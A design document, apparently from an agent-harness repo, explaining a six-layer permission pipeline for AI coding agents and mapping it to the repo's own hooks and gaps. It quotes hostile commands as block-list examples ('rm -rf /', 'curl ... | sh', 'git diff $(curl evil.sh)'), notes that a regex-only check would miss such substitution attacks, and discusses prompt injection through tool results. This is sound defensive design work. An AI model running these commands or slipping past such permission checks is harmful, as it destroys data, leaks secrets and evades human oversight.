Permissions
Table of Contents
- Permissions
- The core problem
- The 6-layer permission classification pipeline
- Layer 1: Safe tool allowlist
- Layer 2: Permission modes
- Layer 3: Rule matching
- Layer 4: Dangerous patterns
- Layer 5: Command security (AST analysis)
- Layer 6: Denial tracking (anti-fatigue)
- Speculative classifier
- Defense in depth
- Anti-patterns
- Takeaways for harness engineering
- What this repo does
- Gaps in this repo
- Open problems
Permissions
Permissions are the safety layer that decides which actions are allowed, asked, or denied. Permission engineering is harness engineering’s defense system.
The naive approach is binary allow/deny. The actual problem is much harder: balance safety against permission fatigue, prevent rubber-stamping, defend against prompt injection, and stay performant for trivial actions.
The core problem
Unrestricted shell access is dangerous: an agent can rm -rf /, drop tables, leak secrets, force-push to main. Universal approval requirement is also dangerous, but in a different way: users develop permission fatigue and start clicking “approve” without reading. The classifier becomes a placebo.
The real design problem: make safe actions invisible and dangerous actions visible. Trivial reads should never bother the user. Destructive operations should always interrupt them.
The 6-layer permission classification pipeline
Claude Code’s permission system runs every action through 6 layers, cheapest first:
| # | Layer | Purpose | Fast path |
|---|---|---|---|
| 1 | Safe tool allowlist | FileRead, Grep, Glob → skip pipeline | 99% of requests fast-pathed |
| 2 | Permission modes | 7 modes from default → plan → auto → bypass | Mode determines default behavior |
| 3 | Rule matching | Exact match, prefix patterns (:*), wildcards | allow / deny / ask |
| 4 | Dangerous patterns | Block interpreters (python, node, eval, sudo) even if a rule allows them | Safety net |
| 5 | Command security | Bash AST analysis: substitution, Zsh exploits, heredoc injection | Block / sanitize |
| 6 | Denial tracking | 3 consecutive or 20 total denials → fall back to human | Anti-fatigue |
Why this order:
- Cheapest layer first (allowlist is a hash lookup)
- Most expensive layer last (AST parsing is slow)
- Denial tracking is at the end because it observes the outcome of the previous layers
Key principle: layer ordering is a performance lever AND a safety lever. The fast path runs in microseconds; the slow path catches the dangerous edge cases.
Layer 1: Safe tool allowlist
Reads, greps, globs — operations that cannot mutate state — are unconditionally allowed. They never go through the rest of the pipeline.
Why it matters: 99% of agent actions are reads. Routing them through 6 layers wastes CPU. The allowlist is a fast path that keeps the agent feeling responsive.
Trade-off: “safe” tools can still leak data. Read .env is technically a read, but it should not be on the allowlist. This repo uses privacy-block.cjs to add a privacy layer on top of the safe-tool fast path (see “What this repo does” below).
Layer 2: Permission modes
Seven modes, each with different default behavior:
| Mode | Default | Use case |
|---|---|---|
| default | Approve risky actions | Normal operation |
| plan | Read-only, no writes | Explore and plan phase |
| auto | Low-risk auto-approved, high-risk gated | Productive work with safety net |
| bypass | Skip approval for approved tools (not dangerous patterns) | Trusted automation |
| yolo | Full autonomy | Dangerous, demos only |
| readonly | Strict read-only | Audit / inspection sessions |
| workspace-write | Write only inside workspace | Project-scoped editing |
The mode is the user’s high-level safety choice. Inside the chosen mode, the rest of the pipeline still runs.
Insight: the mode is a category of behavior, not a specific permission. Layers 3–6 still apply within the chosen mode.
Layer 3: Rule matching
User-defined permission rules:
{
"allow": [
"Read(/private/data/**)",
"Bash(npm test*)",
"Bash(git diff*)"
],
"deny": [
"Bash(rm -rf*)",
"Read(.env)"
]
}
Three pattern types:
- Exact match —
Bash(git status) - Prefix match —
Bash(git diff*)→ matchesgit diff,git diff HEAD,git diff --stat - Wildcard —
Read(/private/data/**)→ recursive directory match
Each rule produces one of: allow, deny, ask. First match wins.
Trade-off: users add overly broad rules (“Bash(git*)”) that allow dangerous actions (“git push –force”). Layer 4 catches this.
Layer 4: Dangerous patterns
A safety net for over-broad user rules. Even if the user allows Bash(*), this layer blocks:
python,node,eval— interpreter escapesudo— privilege escalationcurl ... | sh— pipe-to-shell> /etc/...— system file overwrite
Why it matters: users will always grant rules that are too broad. This layer is the “you can’t allow this even if you wanted to” backstop. Defense-in-depth: rule matching is the first line; dangerous patterns is the second.
Trade-off: the dangerous-pattern list needs ongoing tuning. New attack surfaces appear (bunx, pnpx, npx ...). Static lists drift.
Layer 5: Command security (AST analysis)
Bash commands get parsed into an AST and analyzed for:
- Command substitution —
$(...),`...`(allows code execution outside the visible command) - Zsh exploits —
=,=( )glob expansion gotchas - Heredoc injection —
<<EOFcontent can hide commands - Variable expansion attacks —
$VARwhereVARis attacker-controlled
The AST layer catches what the regex layer cannot. git diff $MALICIOUS_VAR looks safe to a regex; the AST sees the unbounded substitution and flags it.
Cost: AST parsing is the most expensive layer. That’s why it’s last — only commands that survived the previous layers get parsed.
Layer 6: Denial tracking (anti-fatigue)
The system counts denials. Two thresholds:
- 3 consecutive denials → escalate to human (stop asking, get explicit override)
- 20 total denials in a session → escalate to human
Why: if the agent is being denied repeatedly, the rules are wrong or the agent is doing something genuinely off-path. Either way, the human needs to intervene.
The escalation path is: stop the auto-classifier, surface the situation as a structured prompt, let the human decide whether to broaden the rules, abort the task, or adjust the agent’s approach.
Insight: denial tracking turns the permission system into a feedback loop. Repeated denials are a signal that the rules need tuning, not just an annoyance.
Speculative classifier
BashTool starts the permission check in parallel with input parsing. By the time canUseTool() is called, the classification result may already be ready. Reduces perceived latency for the user.
Lesson: if you have a slow check that’s deterministic given the input, start it as soon as the input is available. Don’t wait for the consumer to ask.
Defense in depth
Permissions are enforced at multiple levels simultaneously:
- Tool list — agent doesn’t have the tool at all (e.g., coordinator without
Edit) - Permission rules — tool exists but its use is gated
- Dangerous patterns — even allowed tools have hard blocks on certain inputs
- AST analysis — even safe-looking inputs get parsed for hidden risk
- Denial tracking — even with all of the above, repeated denials escalate
Any single layer can fail; the rest catch it. This is the “Swiss cheese” model of safety: holes in one slice are blocked by the next.
Anti-patterns
- Binary allow/deny. No “ask” middle ground. Users get fatigued or get burned.
- Single-layer enforcement. “We have permission rules” — and nothing else. One bad rule = compromise.
- No allowlist fast path. Every read goes through 6 layers. Slow and battery-killing.
- No dangerous-pattern net. User grants
Bash(*)and getsrm -rffor free. - Regex-only command parsing. Misses substitution, heredocs, variable injection. Use an AST.
- No denial tracking. Permission fatigue is invisible. Users start rubber-stamping; agents get away with more.
- Permission by prompt. “The agent is told not to do dangerous things.” Prompts fail under context pressure. Enforce by capability.
- No mode separation. One permission state for all sessions. Plan-mode and yolo-mode are the same agent.
- Synchronous deep checks on the fast path. AST-parsing every Read. Kills latency.
- Permission rules without versioning. Users edit them, things break, no history.
Takeaways for harness engineering
- Layer the pipeline. Cheap → expensive. Allowlist → modes → rules → dangerous patterns → AST → denial tracking. Each layer has a different job.
- Default to deny. New tools are denied until explicitly allowed.
- Defense in depth. Multiple layers must independently catch the same threat.
- Track denials. Repeated denials = wrong rules OR off-path agent. Surface it.
- Speculative classification. Start the check before the consumer asks. Hide latency.
- Permission rules are versioned config. Diff them, review them, alert on changes.
- Capability removal beats prompt restriction. If the agent shouldn’t do X, remove the tool, don’t ask nicely.
- Mode is a UX shortcut. Modes encode common configurations. Behind the mode, the layers still apply.
- AST > regex for command analysis. Always.
- Privacy is orthogonal to permission. A
Readaction can be permitted but privacy-blocked. Use a separate layer for sensitive content.
What this repo does
hooks/scout-block.cjs— implements a scout-style allowlist + denylist on top of all file/bash operations. Reads.ckignore(gitignore syntax). Blocks reads fromnode_modules/,dist/,.venv/, etc. but allows build commands (npm build,cargo build,terraform,kubectl). Layer 1 + Layer 4 combined.hooks/privacy-block.cjs— privacy-based blocking, separate from size-based scout-block. BlocksRead .env, credentials.json, etc. unless the LLM uses anAPPROVED:prefix that requires user approval first. Layer 4 with a UX twist: the agent must explicitly request override, can’t sneak past.skills/careful/— destructive command guardrail. Registers a PreToolUse(Bash) hook that interceptsrm -rf,DROP TABLE, force-push,git reset --hard,kubectl delete. Each warning is overridable. Layer 4 as a user-invocable mode.skills/freeze/— edit-scope guardrail. Registers a PreToolUse(Edit) hook that restricts writes to one directory per session. Layer 3-equivalent for writes, scoped to the session.hooks/guard-task.cjs— forces user approval before subagent spawning. Permission gate on a tool that’s expensive rather than dangerous.settings.jsonpermissions block — Layer 3 rule matching, project-wide.settings.local.jsonpermissions block — same, machine-specific overrides (additive).
Gaps in this repo
- No AST-level command analysis. Bash commands are checked by regex/string matching only. A
git diff $(curl evil.sh)substitution attack would slip past. - No denial tracking. The harness doesn’t count denials or escalate after repeated friction. Fatigue is invisible.
- No speculative classifier. Permission checks are synchronous on the critical path.
- No formal mode system. Plan / act / yolo modes are not first-class — they’re emergent from skill invocations.
- Dangerous-pattern list is small.
carefulskill has the most coverage; the global hook layer doesn’t have a baseline dangerous-pattern check.
Open problems
- Auto-mode classifier. Claude Code’s “auto-mode” uses an LLM classifier to auto-approve low-risk actions. The prompt is unknown; the accuracy is unknown; the failure modes are unknown. Open research.
- Permission rule audit. Users add allow rules that are too broad over time. No periodic audit mechanism. How do you detect that the security posture has degraded?
- Multi-tenant isolation. Permission rules are per-project. In a multi-user platform, who decides which rules are enforced? Open problem.
- Prompt injection defense. Tool results contain external data (file contents, web pages). Attacker embeds instructions. Claude Code relies on model judgment (“flag suspected prompt injection before continuing”). No structural defense — known gap.